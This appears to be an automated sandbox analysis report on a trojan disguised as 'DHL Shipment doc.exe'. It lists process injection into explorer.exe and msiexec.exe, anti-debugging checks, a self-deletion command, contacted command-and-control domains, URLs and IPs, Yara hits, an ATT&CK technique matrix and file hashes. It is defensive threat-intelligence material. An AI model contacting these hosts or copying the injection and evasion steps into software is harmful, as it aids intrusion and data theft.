          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D18A0A mov eax, dword ptr fs:[00000030h]11_2_04D18A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D44A2C mov eax, dword ptr fs:[00000030h]11_2_04D44A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D44A2C mov eax, dword ptr fs:[00000030h]11_2_04D44A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D853CA mov eax, dword ptr fs:[00000030h]11_2_04D853CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D853CA mov eax, dword ptr fs:[00000030h]11_2_04D853CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D303E2 mov eax, dword ptr fs:[00000030h]11_2_04D303E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2DBE9 mov eax, dword ptr fs:[00000030h]11_2_04D2DBE9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3B390 mov eax, dword ptr fs:[00000030h]11_2_04D3B390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D32397 mov eax, dword ptr fs:[00000030h]11_2_04D32397
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC138A mov eax, dword ptr fs:[00000030h]11_2_04DC138A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DBD380 mov ecx, dword ptr fs:[00000030h]11_2_04DBD380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D11B8F mov eax, dword ptr fs:[00000030h]11_2_04D11B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D11B8F mov eax, dword ptr fs:[00000030h]11_2_04D11B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD5BA5 mov eax, dword ptr fs:[00000030h]11_2_04DD5BA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D34BAD mov eax, dword ptr fs:[00000030h]11_2_04D34BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD8B58 mov eax, dword ptr fs:[00000030h]11_2_04DD8B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0F358 mov eax, dword ptr fs:[00000030h]11_2_04D0F358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0DB40 mov eax, dword ptr fs:[00000030h]11_2_04D0DB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D33B7A mov eax, dword ptr fs:[00000030h]11_2_04D33B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D33B7A mov eax, dword ptr fs:[00000030h]11_2_04D33B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0DB60 mov ecx, dword ptr fs:[00000030h]11_2_04D0DB60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC131B mov eax, dword ptr fs:[00000030h]11_2_04DC131B
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Code function: 3_2_00409B50 LdrLoadDll, 3_2_00409B50
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe, Domain query: www.bbgm4egda.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exe, Domain query: www.auctions.email
          Source: C:\Windows\explorer.exe, Domain query: www.klopert77.com
          Source: C:\Windows\explorer.exe, Network Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exe, Network Connect: 35.213.137.92 80
          Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exe, Domain query: www.solatopotato.com
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: EC0000
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: unknown target: unknown protection: read write
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\msiexec.exe, Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Process created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Process created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: explorer.exe, 00000006.00000000.695852075.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.767118956.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.733166443.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.715605590.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.719824080.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.733753487.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.715899301.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.767387200.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.696692590.0000000001080000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.746158285.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.724490160.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.708216741.000000000A716000.00000004.00000001.00020000.00000000.sdmp, Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Users\user\Desktop\DHL Shipment doc.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\DHL Shipment doc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          512
          Process Injection
          1
          Masquerading
          1
          Input Capture
          221
          Security Software Discovery
          Remote Services1
          Input Capture
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol11
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information
          LSA Secrets112
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Timestomp
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          DLL Side-Loading
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          File Deletion
          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Behavior graph (image not reproduced): Behavior Graph ID: 568428; Sample: DHL Shipment doc.exe; Start date: 08/02/2022; Architecture: WINDOWS; Score: 100

          Source | Detection | Scanner | Label
          DHL Shipment doc.exe | 35% | ReversingLabs | Win32.Trojan.Swotter
          DHL Shipment doc.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          3.0.DHL Shipment doc.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.DHL Shipment doc.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.DHL Shipment doc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.DHL Shipment doc.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          Source | Detection | Scanner | Label
          www.floridanratraining.com/how6/ | 100% | Avira URL Cloud | malware
          http://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd | 0% | Avira URL Cloud | safe
          http://www.solatopotato.com/how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd | 0% | Avira URL Cloud | safe
          http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd | 100% | Avira URL Cloud | malware
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.metronixmedical.com | 35.213.137.92 | true | false | | unknown
          webfactory.agency | 34.102.136.180 | true | true | | unknown
          solatopotato.com | 81.169.145.72 | true | true | | unknown
          www.adwin-estate.com | 37.140.192.43 | true | true | | unknown
          www.auctions.email | 64.190.62.111 | true | true | | unknown
          www.bbgm4egda.xyz | unknown | unknown | true | | unknown
          www.webfactory.agency | unknown | unknown | true | | unknown
          www.solatopotato.com | unknown | unknown | true | | unknown
          www.klopert77.com | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.floridanratraining.com/how6/ | true | Avira URL Cloud: malware | low
          http://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd | false | Avira URL Cloud: safe | unknown
          http://www.solatopotato.com/how6/?W6vtR=4EPEhjHsb2zicvYNP8lD0qzrINMa8IRsv4Cq+fHosD6XE0pK2EAVk/7C/sJ+vhveOIRa&pN6=9ri0dbnPLFLdd | true | Avira URL Cloud: safe | unknown
          http://www.auctions.email/how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd | true | Avira URL Cloud: malware | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          81.169.145.72 | solatopotato.com | Germany | 6724 | STRATOSTRATOAGDE | true
          35.213.137.92 | www.metronixmedical.com | United States | 15169 | GOOGLEUS | false
          64.190.62.111 | www.auctions.email | United States | 11696 | NBS11696US | true
                            IP
                            192.168.2.1
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:568428
                            Start date:08.02.2022
                            Start time:11:20:36
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:DHL Shipment doc.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:22
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@12/1@7/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HDC Information:
                            • Successful, ratio: 23% (good quality ratio 20.7%)
                            • Quality average: 70.6%
                            • Quality standard deviation: 32.3%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 130
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Execution Graph export aborted for target DHL Shipment doc.exe, PID 5820 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
          Time | Type | Description
          11:21:38 | API Interceptor | 1x Sleep call for process: DHL Shipment doc.exe modified
                            Process:C:\Users\user\Desktop\DHL Shipment doc.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1310
                            Entropy (8bit):5.345651901398759
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                            MD5:D918C6A765EDB90D2A227FE23A3FEC98
                            SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                            SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                            SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.701844807359983
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:DHL Shipment doc.exe
                            File size:550912
                            MD5:4f0d2852d2aad43eddf9416661933701
                            SHA1:abe4f65cc594a4c217a65486c3025832fe037161
                            SHA256:45469e46b7281b1f1c74cbd1953e47121a233462b7ab0db7b8346c5b7b3dfa1c
                            SHA512:18953eb90af6fe26fab093471379541bbf82b99ec06a586d8d0c7093076921cc971b7d4f627305f3c58eb36cae0d566d00cb38acf130509933eaa6dc78102981
                            SSDEEP:12288:gFJGB4ay527F6OgOvJxgkMWK0EwL8DR4xlIdXl2u:gLmF5/ovx0EwLGyxiJ8
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?Q...................&...>.......D... ...`....@.. ....................................@................................
                            Icon Hash:88c4e0d2742c5402
                            Entrypoint:0x48449e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x9CDF513F [Mon May 26 14:03:43 2053 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:v4.0.30319
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84450 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x88000 | 0x38b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x843f9 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
